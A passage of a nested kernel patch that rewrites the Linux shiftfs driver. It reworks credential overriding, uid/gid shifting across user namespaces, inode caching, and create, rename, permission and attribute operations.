++{
++	revert_creds(oldcred);
++	put_cred(newcred);
++}
++
++static int shiftfs_override_object_creds(const struct super_block *sb,
++					 const struct cred **oldcred,
++					 struct cred **newcred,
++					 struct dentry *dentry, umode_t mode,
++					 bool hardlink)
++{
++	kuid_t fsuid = current_fsuid();
++	kgid_t fsgid = current_fsgid();
++
++	*oldcred = shiftfs_override_creds(sb);
++
++	*newcred = prepare_creds();
++	if (!*newcred) {
++		revert_creds(*oldcred);
++		return -ENOMEM;
++	}
++
++	(*newcred)->fsuid = KUIDT_INIT(from_kuid(sb->s_user_ns, fsuid));
++	(*newcred)->fsgid = KGIDT_INIT(from_kgid(sb->s_user_ns, fsgid));
++
++	if (!hardlink) {
++		int err = security_dentry_create_files_as(dentry, mode,
++							  &dentry->d_name,
++							  *oldcred, *newcred);
++		if (err) {
++			shiftfs_revert_object_creds(*oldcred, *newcred);
++			return err;
++		}
++	}
+ 
+-	cred->fsuid = KUIDT_INIT(from_kuid(sb->s_user_ns, cred->fsuid));
+-	cred->fsgid = KGIDT_INIT(from_kgid(sb->s_user_ns, cred->fsgid));
+-	put_user_ns(cred->user_ns);
+-	cred->user_ns = get_user_ns(ssi->userns);
++	put_cred(override_creds(*newcred));
++	return 0;
++}
+ 
+-	return cred;
++static kuid_t shift_kuid(struct user_namespace *from, struct user_namespace *to,
++			 kuid_t kuid)
++{
++	uid_t uid = from_kuid(from, kuid);
++	return make_kuid(to, uid);
+ }
+ 
+-static const struct cred *shiftfs_new_creds(const struct cred **newcred,
+-					    struct super_block *sb)
++static kgid_t shift_kgid(struct user_namespace *from, struct user_namespace *to,
++			 kgid_t kgid)
+ {
+-	const struct cred *cred = shiftfs_get_up_creds(sb);
++	gid_t gid = from_kgid(from, kgid);
++	return make_kgid(to, gid);
++}
+ 
+-	*newcred = cred;
++static void shiftfs_copyattr(struct inode *from, struct inode *to)
++{
++	struct user_namespace *from_ns = from->i_sb->s_user_ns;
++	struct user_namespace *to_ns = to->i_sb->s_user_ns;
++
++	to->i_uid = shift_kuid(from_ns, to_ns, from->i_uid);
++	to->i_gid = shift_kgid(from_ns, to_ns, from->i_gid);
++	to->i_mode = from->i_mode;
++	to->i_atime = from->i_atime;
++	to->i_mtime = from->i_mtime;
++	to->i_ctime = from->i_ctime;
++	i_size_write(to, i_size_read(from));
++}
+ 
+-	if (cred)
+-		cred = override_creds(cred);
+-	else
+-		printk(KERN_ERR "shiftfs: Credential override failed: no memory\n");
++static void shiftfs_copyflags(struct inode *from, struct inode *to)
++{
++	unsigned int mask = S_SYNC | S_IMMUTABLE | S_APPEND | S_NOATIME;
+ 
+-	return cred;
++	inode_set_flags(to, from->i_flags & mask, mask);
+ }
+ 
+-static void shiftfs_old_creds(const struct cred *oldcred,
+-			      const struct cred **newcred)
++static void shiftfs_file_accessed(struct file *file)
+ {
+-	if (!*newcred)
++	struct inode *upperi, *loweri;
++
++	if (file->f_flags & O_NOATIME)
+ 		return;
+ 
+-	revert_creds(oldcred);
+-	put_cred(*newcred);
++	upperi = file_inode(file);
++	loweri = upperi->i_private;
++
++	if (!loweri)
++		return;
++
++	upperi->i_mtime = loweri->i_mtime;
++	upperi->i_ctime = loweri->i_ctime;
++
++	touch_atime(&file->f_path);
+ }
+ 
+-static int shiftfs_parse_options(struct shiftfs_super_info *ssi, char *options)
++static int shiftfs_parse_mount_options(struct shiftfs_super_info *sbinfo,
++				       char *options)
+ {
+ 	char *p;
+ 	substring_t args[MAX_OPT_ARGS];
+ 
+-	ssi->mark = false;
++	sbinfo->mark = false;
++	sbinfo->passthrough = 0;
+ 
+ 	while ((p = strsep(&options, ",")) != NULL) {
+-		int token;
++		int err, intarg, token;
+ 
+ 		if (!*p)
+ 			continue;
+@@ -91,121 +188,140 @@ static int shiftfs_parse_options(struct shiftfs_super_info *ssi, char *options)
+ 		token = match_token(p, tokens, args);
+ 		switch (token) {
+ 		case OPT_MARK:
+-			ssi->mark = true;
++			sbinfo->mark = true;
++			break;
++		case OPT_PASSTHROUGH:
++			err = match_int(&args[0], &intarg);
++			if (err)
++				return err;
++
++			if (intarg & ~SHIFTFS_PASSTHROUGH_ALL)
++				return -EINVAL;
++
++			sbinfo->passthrough = intarg;
+ 			break;
+ 		default:
+ 			return -EINVAL;
+ 		}
+ 	}
++
+ 	return 0;
+ }
+ 
+ static void shiftfs_d_release(struct dentry *dentry)
+ {
+-	struct dentry *real = dentry->d_fsdata;
++	struct dentry *lowerd = dentry->d_fsdata;
+ 
+-	dput(real);
++	if (lowerd)
++		dput(lowerd);
+ }
+ 
+ static struct dentry *shiftfs_d_real(struct dentry *dentry,
+ 				     const struct inode *inode)
+ {
+-	struct dentry *real = dentry->d_fsdata;
++	struct dentry *lowerd = dentry->d_fsdata;
++
++	if (inode && d_inode(dentry) == inode)
++		return dentry;
+ 
+-	if (unlikely(real->d_flags & DCACHE_OP_REAL))
+-		return real->d_op->d_real(real, real->d_inode);
++	lowerd = d_real(lowerd, inode);
++	if (lowerd && (!inode || inode == d_inode(lowerd)))
++		return lowerd;
+ 
+-	return real;
++	WARN(1, "shiftfs_d_real(%pd4, %s:%lu): real dentry not found\n", dentry,
++	     inode ? inode->i_sb->s_id : "NULL", inode ? inode->i_ino : 0);
++	return dentry;
+ }
+ 
+ static int shiftfs_d_weak_revalidate(struct dentry *dentry, unsigned int flags)
+ {
+-	struct dentry *real = dentry->d_fsdata;
++	int err = 1;
++	struct dentry *lowerd = dentry->d_fsdata;
+ 
+-	if (d_unhashed(real))
++	if (d_is_negative(lowerd) != d_is_negative(dentry))
+ 		return 0;
+ 
+-	if (!(real->d_flags & DCACHE_OP_WEAK_REVALIDATE))
+-		return 1;
++	if ((lowerd->d_flags & DCACHE_OP_WEAK_REVALIDATE))
++		err = lowerd->d_op->d_weak_revalidate(lowerd, flags);
+ 
+-	return real->d_op->d_weak_revalidate(real, flags);
++	if (d_really_is_positive(dentry)) {
++		struct inode *inode = d_inode(dentry);
++		struct inode *loweri = d_inode(lowerd);
++
++		shiftfs_copyattr(loweri, inode);
++		if (!inode->i_nlink)
++			err = 0;
++	}
++
++	return err;
+ }
+ 
+ static int shiftfs_d_revalidate(struct dentry *dentry, unsigned int flags)
+ {
+-	struct dentry *real = dentry->d_fsdata;
+-	int ret;
++	int err = 1;
++	struct dentry *lowerd = dentry->d_fsdata;
+ 
+-	if (d_unhashed(real))
++	if (d_unhashed(lowerd) ||
++	    ((d_is_negative(lowerd) != d_is_negative(dentry))))
+ 		return 0;
+ 
+-	/*
+-	 * inode state of underlying changed from positive to negative
+-	 * or vice versa; force a lookup to update our view
+-	 */
+-	if (d_is_negative(real) != d_is_negative(dentry))
+-		return 0;
++	if (flags & LOOKUP_RCU)
++		return -ECHILD;
+ 
+-	if (!(real->d_flags & DCACHE_OP_REVALIDATE))
+-		return 1;
++	if ((lowerd->d_flags & DCACHE_OP_REVALIDATE))
++		err = lowerd->d_op->d_revalidate(lowerd, flags);
+ 
+-	ret = real->d_op->d_revalidate(real, flags);
++	if (d_really_is_positive(dentry)) {
++		struct inode *inode = d_inode(dentry);
++		struct inode *loweri = d_inode(lowerd);
+ 
+-	if (ret == 0 && !(flags & LOOKUP_RCU))
+-		d_invalidate(real);
++		shiftfs_copyattr(loweri, inode);
++		if (!inode->i_nlink)
++			err = 0;
++	}
+ 
+-	return ret;
++	return err;
+ }
+ 
+ static const struct dentry_operations shiftfs_dentry_ops = {
+-	.d_release	= shiftfs_d_release,
+-	.d_real		= shiftfs_d_real,
+-	.d_revalidate	= shiftfs_d_revalidate,
++	.d_release	   = shiftfs_d_release,
++	.d_real		   = shiftfs_d_real,
++	.d_revalidate	   = shiftfs_d_revalidate,
+ 	.d_weak_revalidate = shiftfs_d_weak_revalidate,
+ };
+ 
+-static int shiftfs_readlink(struct dentry *dentry, char __user *data,
+-			    int flags)
+-{
+-	struct dentry *real = dentry->d_fsdata;
+-	const struct inode_operations *iop = real->d_inode->i_op;
+-
+-	if (iop->readlink)
+-		return iop->readlink(real, data, flags);
+-
+-	return -EINVAL;
+-}
+-
+ static const char *shiftfs_get_link(struct dentry *dentry, struct inode *inode,
+ 				    struct delayed_call *done)
+ {
+-	if (dentry) {
+-		struct dentry *real = dentry->d_fsdata;
+-		struct inode *reali = real->d_inode;
+-		const struct inode_operations *iop = reali->i_op;
+-		const char *res = ERR_PTR(-EPERM);
+-
+-		if (iop->get_link)
+-			res = iop->get_link(real, reali, done);
++	const char *p;
++	const struct cred *oldcred;
++	struct dentry *lowerd;
+ 
+-		return res;
+-	} else {
+-		/* RCU lookup not supported */
++	/* RCU lookup not supported */
++	if (!dentry)
+ 		return ERR_PTR(-ECHILD);
+-	}
++
++	lowerd = dentry->d_fsdata;
++	oldcred = shiftfs_override_creds(dentry->d_sb);
++	p = vfs_get_link(lowerd, done);
++	revert_creds(oldcred);
++
++	return p;
+ }
+ 
+ static int shiftfs_setxattr(struct dentry *dentry, struct inode *inode,
+ 			    const char *name, const void *value,
+ 			    size_t size, int flags)
+ {
+-	struct dentry *real = dentry->d_fsdata;
+-	int err = -EOPNOTSUPP;
+-	const struct cred *oldcred, *newcred;
++	struct dentry *lowerd = dentry->d_fsdata;
++	int err;
++	const struct cred *oldcred;
++
++	oldcred = shiftfs_override_creds(dentry->d_sb);
++	err = vfs_setxattr(lowerd, name, value, size, flags);
++	revert_creds(oldcred);
+ 
+-	oldcred = shiftfs_new_creds(&newcred, dentry->d_sb);
+-	err = vfs_setxattr(real, name, value, size, flags);
+-	shiftfs_old_creds(oldcred, &newcred);
++	shiftfs_copyattr(lowerd->d_inode, inode);
+ 
+ 	return err;
+ }
+@@ -214,13 +330,13 @@ static int shiftfs_xattr_get(const struct xattr_handler *handler,
+ 			     struct dentry *dentry, struct inode *inode,
+ 			     const char *name, void *value, size_t size)
+ {
+-	struct dentry *real = dentry->d_fsdata;
++	struct dentry *lowerd = dentry->d_fsdata;
+ 	int err;
+-	const struct cred *oldcred, *newcred;
++	const struct cred *oldcred;
+ 
+-	oldcred = shiftfs_new_creds(&newcred, dentry->d_sb);
+-	err = vfs_getxattr(real, name, value, size);
+-	shiftfs_old_creds(oldcred, &newcred);
++	oldcred = shiftfs_override_creds(dentry->d_sb);
++	err = vfs_getxattr(lowerd, name, value, size);
++	revert_creds(oldcred);
+ 
+ 	return err;
+ }
+@@ -228,26 +344,29 @@ static int shiftfs_xattr_get(const struct xattr_handler *handler,
+ static ssize_t shiftfs_listxattr(struct dentry *dentry, char *list,
+ 				 size_t size)
+ {
+-	struct dentry *real = dentry->d_fsdata;
++	struct dentry *lowerd = dentry->d_fsdata;
+ 	int err;
+-	const struct cred *oldcred, *newcred;
++	const struct cred *oldcred;
+ 
+-	oldcred = shiftfs_new_creds(&newcred, dentry->d_sb);
+-	err = vfs_listxattr(real, list, size);
+-	shiftfs_old_creds(oldcred, &newcred);
++	oldcred = shiftfs_override_creds(dentry->d_sb);
++	err = vfs_listxattr(lowerd, list, size);
++	revert_creds(oldcred);
+ 
+ 	return err;
+ }
+ 
+ static int shiftfs_removexattr(struct dentry *dentry, const char *name)
+ {
+-	struct dentry *real = dentry->d_fsdata;
++	struct dentry *lowerd = dentry->d_fsdata;
+ 	int err;
+-	const struct cred *oldcred, *newcred;
++	const struct cred *oldcred;
++
++	oldcred = shiftfs_override_creds(dentry->d_sb);
++	err = vfs_removexattr(lowerd, name);
++	revert_creds(oldcred);
+ 
+-	oldcred = shiftfs_new_creds(&newcred, dentry->d_sb);
+-	err = vfs_removexattr(real, name);
+-	shiftfs_old_creds(oldcred, &newcred);
++	/* update c/mtime */
++	shiftfs_copyattr(lowerd->d_inode, d_inode(dentry));
+ 
+ 	return err;
+ }
+@@ -262,93 +381,157 @@ static int shiftfs_xattr_set(const struct xattr_handler *handler,
+ 	return shiftfs_setxattr(dentry, inode, name, value, size, flags);
+ }
+ 
+-static void shiftfs_fill_inode(struct inode *inode, struct dentry *dentry)
++static int shiftfs_inode_test(struct inode *inode, void *data)
+ {
+-	struct inode *reali;
+-
+-	if (!dentry)
+-		return;
+-
+-	reali = dentry->d_inode;
+-
+-	if (!reali->i_op->get_link)
+-		inode->i_opflags |= IOP_NOFOLLOW;
++	return inode->i_private == data;
++}
+ 
+-	inode->i_mapping = reali->i_mapping;
+-	inode->i_private = dentry;
++static int shiftfs_inode_set(struct inode *inode, void *data)
++{
++	inode->i_private = data;
++	return 0;
+ }
+ 
+-static int shiftfs_make_object(struct inode *dir, struct dentry *dentry,
+-			       umode_t mode, const char *symlink,
+-			       struct dentry *hardlink, bool excl)
++static int shiftfs_create_object(struct inode *diri, struct dentry *dentry,
++				 umode_t mode, const char *symlink,
++				 struct dentry *hardlink, bool excl)
+ {
+-	struct dentry *real = dir->i_private, *new = dentry->d_fsdata;
+-	struct inode *reali = real->d_inode, *newi;
+-	const struct inode_operations *iop = reali->i_op;
+ 	int err;
+-	const struct cred *oldcred, *newcred;
+-	bool op_ok = false;
++	const struct cred *oldcred;
++	struct cred *newcred;
++	void *loweri_iop_ptr = NULL;
++	umode_t modei = mode;
++	struct super_block *dir_sb = diri->i_sb;
++	struct dentry *lowerd_new = dentry->d_fsdata;
++	struct inode *inode = NULL, *loweri_dir = diri->i_private;
++	const struct inode_operations *loweri_dir_iop = loweri_dir->i_op;
++	struct dentry *lowerd_link = NULL;
+ 
+ 	if (hardlink) {
+-		op_ok = iop->link;
++		loweri_iop_ptr = loweri_dir_iop->link;
+ 	} else {
+ 		switch (mode & S_IFMT) {
+ 		case S_IFDIR:
+-			op_ok = iop->mkdir;
++			loweri_iop_ptr = loweri_dir_iop->mkdir;
+ 			break;
+ 		case S_IFREG:
+-			op_ok = iop->create;
++			loweri_iop_ptr = loweri_dir_iop->create;
+ 			break;
+ 		case S_IFLNK:
+-			op_ok = iop->symlink;
++			loweri_iop_ptr = loweri_dir_iop->symlink;
++			break;
++		case S_IFSOCK:
++			/* fall through */
++		case S_IFIFO:
++			loweri_iop_ptr = loweri_dir_iop->mknod;
++			break;
+ 		}
+ 	}
+-	if (!op_ok)
+-		return -EINVAL;
++	if (!loweri_iop_ptr) {
++		err = -EINVAL;
++		goto out_iput;
++	}
+ 
++	inode_lock_nested(loweri_dir, I_MUTEX_PARENT);
+ 
+-	newi = shiftfs_new_inode(dentry->d_sb, mode, NULL);
+-	if (!newi)
+-		return -ENOMEM;
++	if (!hardlink) {
++		inode = new_inode(dir_sb);
++		if (!inode) {
++			err = -ENOMEM;
++			goto out_iput;
++		}
++
++		/*
++		 * new_inode() will have added the new inode to the super
++		 * block's list of inodes. Further below we will call
++		 * inode_insert5(), which would perform the same operation again,
++		 * thereby corrupting the list. To avoid this, raise I_CREATING
++		 * in i_state which will cause inode_insert5() to skip this
++		 * step. I_CREATING will be cleared by d_instantiate_new()
++		 * below.
++		 */
++		spin_lock(&inode->i_lock);
++		inode->i_state |= I_CREATING;
++		spin_unlock(&inode->i_lock);
+ 
+-	oldcred = shiftfs_new_creds(&newcred, dentry->d_sb);
++		inode_init_owner(inode, diri, mode);
++		modei = inode->i_mode;
++	}
+ 
+-	inode_lock_nested(reali, I_MUTEX_PARENT);
++	err = shiftfs_override_object_creds(dentry->d_sb, &oldcred, &newcred,
++					    dentry, modei, hardlink != NULL);
++	if (err)
++		goto out_iput;
+ 
+-	err = -EINVAL;		/* shut gcc up about uninit var */
+ 	if (hardlink) {
+-		struct dentry *realhardlink = hardlink->d_fsdata;
+-
+-		err = vfs_link(realhardlink, reali, new, NULL);
++		lowerd_link = hardlink->d_fsdata;
++		err = vfs_link(lowerd_link, loweri_dir, lowerd_new, NULL);
+ 	} else {
+-		switch (mode & S_IFMT) {
++		switch (modei & S_IFMT) {
+ 		case S_IFDIR:
+-			err = vfs_mkdir(reali, new, mode);
++			err = vfs_mkdir(loweri_dir, lowerd_new, modei);
+ 			break;
+ 		case S_IFREG:
+-			err = vfs_create(reali, new, mode, excl);
++			err = vfs_create(loweri_dir, lowerd_new, modei, excl);
+ 			break;
+ 		case S_IFLNK:
+-			err = vfs_symlink(reali, new, symlink);
++			err = vfs_symlink(loweri_dir, lowerd_new, symlink);
++			break;
++		case S_IFSOCK:
++			/* fall through */
++		case S_IFIFO:
++			err = vfs_mknod(loweri_dir, lowerd_new, modei, 0);
++			break;
++		default:
++			err = -EINVAL;
++			break;
+ 		}
+ 	}
+ 
+-	shiftfs_old_creds(oldcred, &newcred);
++	shiftfs_revert_object_creds(oldcred, newcred);
+ 
++	if (!err && WARN_ON(!lowerd_new->d_inode))
++		err = -EIO;
+ 	if (err)
+-		goto out_dput;
++		goto out_iput;
++
++	if (hardlink) {
++		inode = d_inode(hardlink);
++		ihold(inode);
++
++		/* copy up times from lower inode */
++		shiftfs_copyattr(d_inode(lowerd_link), inode);
++		set_nlink(d_inode(hardlink), d_inode(lowerd_link)->i_nlink);
++		d_instantiate(dentry, inode);
++	} else {
++		struct inode *inode_tmp;
++		struct inode *loweri_new = d_inode(lowerd_new);
++
++		inode_tmp = inode_insert5(inode, (unsigned long)loweri_new,
++					  shiftfs_inode_test, shiftfs_inode_set,
++					  loweri_new);
++		if (unlikely(inode_tmp != inode)) {
++			pr_err_ratelimited("shiftfs: newly created inode found in cache\n");
++			iput(inode_tmp);
++			err = -EINVAL;
++			goto out_iput;
++		}
+ 
+-	shiftfs_fill_inode(newi, new);
++		ihold(loweri_new);
++		shiftfs_fill_inode(inode, loweri_new->i_ino, loweri_new->i_mode,
++				   0, lowerd_new);
++		d_instantiate_new(dentry, inode);
++	}
+ 
+-	d_instantiate(dentry, newi);
++	shiftfs_copyattr(loweri_dir, diri);
++	if (loweri_iop_ptr == loweri_dir_iop->mkdir)
++		set_nlink(diri, loweri_dir->i_nlink);
+ 
+-	new = NULL;
+-	newi = NULL;
++	inode = NULL;
+ 
+- out_dput:
+-	dput(new);
+-	iput(newi);
+-	inode_unlock(reali);
++out_iput:
++	iput(inode);
++	inode_unlock(loweri_dir);
+ 
+ 	return err;
+ }
+@@ -358,7 +541,7 @@ static int shiftfs_create(struct inode *dir, struct dentry *dentry,
+ {
+ 	mode |= S_IFREG;
+ 
+-	return shiftfs_make_object(dir, dentry, mode, NULL, NULL, excl);
++	return shiftfs_create_object(dir, dentry, mode, NULL, NULL, excl);
+ }
+ 
+ static int shiftfs_mkdir(struct inode *dir, struct dentry *dentry,
+@@ -366,39 +549,52 @@ static int shiftfs_mkdir(struct inode *dir, struct dentry *dentry,
+ {
+ 	mode |= S_IFDIR;
+ 
+-	return shiftfs_make_object(dir, dentry, mode, NULL, NULL, false);
++	return shiftfs_create_object(dir, dentry, mode, NULL, NULL, false);
+ }
+ 
+ static int shiftfs_link(struct dentry *hardlink, struct inode *dir,
+ 			struct dentry *dentry)
+ {
+-	return shiftfs_make_object(dir, dentry, 0, NULL, hardlink, false);
++	return shiftfs_create_object(dir, dentry, 0, NULL, hardlink, false);
++}
++
++static int shiftfs_mknod(struct inode *dir, struct dentry *dentry, umode_t mode,
++			 dev_t rdev)
++{
++	if (!S_ISFIFO(mode) && !S_ISSOCK(mode))
++		return -EPERM;
++
++	return shiftfs_create_object(dir, dentry, mode, NULL, NULL, false);
+ }
+ 
+ static int shiftfs_symlink(struct inode *dir, struct dentry *dentry,
+ 			   const char *symlink)
+ {
+-	return shiftfs_make_object(dir, dentry, S_IFLNK, symlink, NULL, false);
++	return shiftfs_create_object(dir, dentry, S_IFLNK, symlink, NULL, false);
+ }
+ 
+ static int shiftfs_rm(struct inode *dir, struct dentry *dentry, bool rmdir)
+ {
+-	struct dentry *real = dir->i_private, *new = dentry->d_fsdata;
+-	struct inode *reali = real->d_inode;
++	struct dentry *lowerd = dentry->d_fsdata;
++	struct inode *loweri = dir->i_private;
+ 	int err;
+-	const struct cred *oldcred, *newcred;
+-
+-	inode_lock_nested(reali, I_MUTEX_PARENT);
+-
+-	oldcred = shiftfs_new_creds(&newcred, dentry->d_sb);
++	const struct cred *oldcred;
+ 
++	oldcred = shiftfs_override_creds(dentry->d_sb);
++	inode_lock_nested(loweri, I_MUTEX_PARENT);
+ 	if (rmdir)
+-		err = vfs_rmdir(reali, new);
++		err = vfs_rmdir(loweri, lowerd);
+ 	else
+-		err = vfs_unlink(reali, new, NULL);
++		err = vfs_unlink(loweri, lowerd, NULL);
++	inode_unlock(loweri);
++	revert_creds(oldcred);
+ 
+-	shiftfs_old_creds(oldcred, &newcred);
+-	inode_unlock(reali);
++	shiftfs_copyattr(loweri, dir);
++	set_nlink(d_inode(dentry), loweri->i_nlink);
++	if (!err)
++		d_drop(dentry);
++
++	set_nlink(dir, loweri->i_nlink);
+ 
+ 	return err;
+ }
+@@ -417,27 +613,30 @@ static int shiftfs_rename(struct inode *olddir, struct dentry *old,
+ 			  struct inode *newdir, struct dentry *new,
+ 			  unsigned int flags)
+ {
+-	struct dentry *rodd = olddir->i_private, *rndd = newdir->i_private,
+-		*realold = old->d_fsdata,
+-		*realnew = new->d_fsdata, *trap;
+-	struct inode *realolddir = rodd->d_inode, *realnewdir = rndd->d_inode;
++	struct dentry *lowerd_dir_old = old->d_parent->d_fsdata,
++		      *lowerd_dir_new = new->d_parent->d_fsdata,
++		      *lowerd_old = old->d_fsdata, *lowerd_new = new->d_fsdata,
++		      *trapd;
++	struct inode *loweri_dir_old = lowerd_dir_old->d_inode,
++		     *loweri_dir_new = lowerd_dir_new->d_inode;
+ 	int err = -EINVAL;
+-	const struct cred *oldcred, *newcred;
++	const struct cred *oldcred;
+ 
+-	trap = lock_rename(rndd, rodd);
++	trapd = lock_rename(lowerd_dir_new, lowerd_dir_old);
+ 
+-	if (trap == realold || trap == realnew)
++	if (trapd == lowerd_old || trapd == lowerd_new)
+ 		goto out_unlock;
+ 
+-	oldcred = shiftfs_new_creds(&newcred, old->d_sb);
+-
+-	err = vfs_rename(realolddir, realold, realnewdir,
+-			 realnew, NULL, flags);
++	oldcred = shiftfs_override_creds(old->d_sb);
++	err = vfs_rename(loweri_dir_old, lowerd_old, loweri_dir_new, lowerd_new,
++			 NULL, flags);
++	revert_creds(oldcred);
+ 
+-	shiftfs_old_creds(oldcred, &newcred);
++	shiftfs_copyattr(loweri_dir_old, olddir);
++	shiftfs_copyattr(loweri_dir_new, newdir);
+ 
+- out_unlock:
+-	unlock_rename(rndd, rodd);
++out_unlock:
++	unlock_rename(lowerd_dir_new, lowerd_dir_old);
+ 
+ 	return err;
+ }
+@@ -445,304 +644,1210 @@ static int shiftfs_rename(struct inode *olddir, struct dentry *old,
+ static struct dentry *shiftfs_lookup(struct inode *dir, struct dentry *dentry,
+ 				     unsigned int flags)
+ {
+-	struct dentry *real = dir->i_private, *new;
+-	struct inode *reali = real->d_inode, *newi;
+-	const struct cred *oldcred, *newcred;
+-
+-	inode_lock(reali);
+-	oldcred = shiftfs_new_creds(&newcred, dentry->d_sb);
+-	new = lookup_one_len(dentry->d_name.name, real, dentry->d_name.len);
+-	shiftfs_old_creds(oldcred, &newcred);
+-	inode_unlock(reali);
++	struct dentry *new;
++	struct inode *newi;
++	const struct cred *oldcred;
++	struct dentry *lowerd = dentry->d_parent->d_fsdata;
++	struct inode *inode = NULL, *loweri = lowerd->d_inode;
++
++	inode_lock(loweri);
++	oldcred = shiftfs_override_creds(dentry->d_sb);
++	new = lookup_one_len(dentry->d_name.name, lowerd, dentry->d_name.len);
++	revert_creds(oldcred);
++	inode_unlock(loweri);
+ 
+ 	if (IS_ERR(new))
+ 		return new;
+ 
+ 	dentry->d_fsdata = new;
+ 
+-	newi = NULL;
+-	if (!new->d_inode)
++	newi = new->d_inode;
++	if (!newi)
+ 		goto out;
+ 
+-	newi = shiftfs_new_inode(dentry->d_sb, new->d_inode->i_mode, new);
+-	if (!newi) {
++	inode = iget5_locked(dentry->d_sb, (unsigned long)newi,
++			     shiftfs_inode_test, shiftfs_inode_set, newi);
++	if (!inode) {
+ 		dput(new);
+ 		return ERR_PTR(-ENOMEM);
+ 	}
++	if (inode->i_state & I_NEW) {
++		/*
++		 * inode->i_private set by shiftfs_inode_set(), but we still
++		 * need to take a reference
++		 */
++		ihold(newi);
++		shiftfs_fill_inode(inode, newi->i_ino, newi->i_mode, 0, new);
++		unlock_new_inode(inode);
++	}
+ 
+- out:
+-	return d_splice_alias(newi, dentry);
++out:
++	return d_splice_alias(inode, dentry);
+ }
+ 
+ static int shiftfs_permission(struct inode *inode, int mask)
+ {
+-	struct dentry *real = inode->i_private;
+-	struct inode *reali = real->d_inode;
+-	const struct inode_operations *iop = reali->i_op;
+ 	int err;
+-	const struct cred *oldcred, *newcred;
++	const struct cred *oldcred;
++	struct inode *loweri = inode->i_private;
+ 
+-	if (mask & MAY_NOT_BLOCK)
++	if (!loweri) {
++		WARN_ON(!(mask & MAY_NOT_BLOCK));
+ 		return -ECHILD;
++	}
+ 
+-	oldcred = shiftfs_new_creds(&newcred, inode->i_sb);
+-	if (iop->permission)
+-		err = iop->permission(reali, mask);
+-	else
+-		err = generic_permission(reali, mask);
+-	shiftfs_old_creds(oldcred, &newcred);
++	err = generic_permission(inode, mask);
++	if (err)
++		return err;
++
++	oldcred = shiftfs_override_creds(inode->i_sb);
++	err = inode_permission(loweri, mask);
++	revert_creds(oldcred);
++
++	return err;
++}
++
++static int shiftfs_fiemap(struct inode *inode,
++			  struct fiemap_extent_info *fieinfo, u64 start,
++			  u64 len)
++{
++	int err;
++	const struct cred *oldcred;
++	struct inode *loweri = inode->i_private;
++
++	if (!loweri->i_op->fiemap)
++		return -EOPNOTSUPP;
++
++	oldcred = shiftfs_override_creds(inode->i_sb);
++	if (fieinfo->fi_flags & FIEMAP_FLAG_SYNC)
++		filemap_write_and_wait(loweri->i_mapping);
++	err = loweri->i_op->fiemap(loweri, fieinfo, start, len);
++	revert_creds(oldcred);
++
++	return err;
++}
++
++static int shiftfs_tmpfile(struct inode *dir, struct dentry *dentry,
++			   umode_t mode)
++{
++	int err;
++	const struct cred *oldcred;
++	struct dentry *lowerd = dentry->d_fsdata;
++	struct inode *loweri = dir->i_private;
++
++	if (!loweri->i_op->tmpfile)
++		return -EOPNOTSUPP;
++
++	oldcred = shiftfs_override_creds(dir->i_sb);
++	err = loweri->i_op->tmpfile(loweri, lowerd, mode);
++	revert_creds(oldcred);
+ 
+ 	return err;
+ }
+ 
+ static int shiftfs_setattr(struct dentry *dentry, struct iattr *attr)
+ {
+-	struct dentry *real = dentry->d_fsdata;
+-	struct inode *reali = real->d_inode;
+-	const struct inode_operations *iop = reali->i_op;
++	struct dentry *lowerd = dentry->d_fsdata;
++	struct inode *loweri = lowerd->d_inode;
+ 	struct iattr newattr = *attr;
+-	const struct cred *oldcred, *newcred;
++	const struct cred *oldcred;
+ 	struct super_block *sb = dentry->d_sb;
+ 	int err;
+ 
++	err = setattr_prepare(dentry, attr);
++	if (err)
++		return err;
++
+ 	newattr.ia_uid = KUIDT_INIT(from_kuid(sb->s_user_ns, attr->ia_uid));
+ 	newattr.ia_gid = KGIDT_INIT(from_kgid(sb->s_user_ns, attr->ia_gid));
+ 
+-	oldcred = shiftfs_new_creds(&newcred, dentry->d_sb);
+-	inode_lock(reali);
+-	if (iop->setattr)
+-		err = iop->setattr(real, &newattr);
+-	else
+-		err = simple_setattr(real, &newattr);
+-	inode_unlock(reali);
+-	shiftfs_old_creds(oldcred, &newcred);
++	inode_lock(loweri);
++	oldcred = shiftfs_override_creds(dentry->d_sb);
++	err = notify_change(lowerd, attr, NULL);
++	revert_creds(oldcred);
++	inode_unlock(loweri);
+ 
+-	if (err)
+-		return err;
++	shiftfs_copyattr(loweri, d_inode(dentry));
+ 
+-	/* all OK, reflect the change on our inode */
+-	setattr_copy(d_inode(dentry), attr);
+-	return 0;
++	return err;
+ }
+ 
+ static int shiftfs_getattr(const struct path *path, struct kstat *stat,
+ 			   u32 request_mask, unsigned int query_flags)
+ {
+ 	struct inode *inode = path->dentry->d_inode;
+-	struct dentry *real = path->dentry->d_fsdata;
+-	struct inode *reali = real->d_inode;
+-	const struct inode_operations *iop = reali->i_op;
+-	struct path newpath = { .mnt = path->dentry->d_sb->s_fs_info, .dentry = real };
+-	int err = 0;
+-
+-	if (iop->getattr)
+-		err = iop->getattr(&newpath, stat, request_mask, query_flags);
+-	else
+-		generic_fillattr(reali, stat);
++	struct dentry *lowerd = path->dentry->d_fsdata;
++	struct inode *loweri = lowerd->d_inode;
++	struct shiftfs_super_info *info = path->dentry->d_sb->s_fs_info;
++	struct path newpath = { .mnt = info->mnt, .dentry = lowerd };
++	struct user_namespace *from_ns = loweri->i_sb->s_user_ns;
++	struct user_namespace *to_ns = inode->i_sb->s_user_ns;
++	const struct cred *oldcred;
++	int err;
++
++	oldcred = shiftfs_override_creds(inode->i_sb);
++	err = vfs_getattr(&newpath, stat, request_mask, query_flags);
++	revert_creds(oldcred);
+ 
+ 	if (err)
+ 		return err;
+ 
+ 	/* transform the underlying id */
+-	stat->uid = make_kuid(inode->i_sb->s_user_ns, __kuid_val(stat->uid));
+-	stat->gid = make_kgid(inode->i_sb->s_user_ns, __kgid_val(stat->gid));
++	stat->uid = shift_kuid(from_ns, to_ns, stat->uid);
++	stat->gid = shift_kgid(from_ns, to_ns, stat->gid);
+ 	return 0;
+ }
+ 
+-static const struct inode_operations shiftfs_inode_ops = {
+-	.lookup		= shiftfs_lookup,
+-	.getattr	= shiftfs_getattr,
+-	.setattr	= shiftfs_setattr,
+-	.permission	= shiftfs_permission,
+-	.mkdir		= shiftfs_mkdir,
+-	.symlink	= shiftfs_symlink,
+-	.get_link	= shiftfs_get_link,
+-	.readlink	= shiftfs_readlink,
+-	.unlink		= shiftfs_unlink,
+-	.rmdir		= shiftfs_rmdir,
+-	.rename		= shiftfs_rename,
+-	.link		= shiftfs_link,
+-	.create		= shiftfs_create,
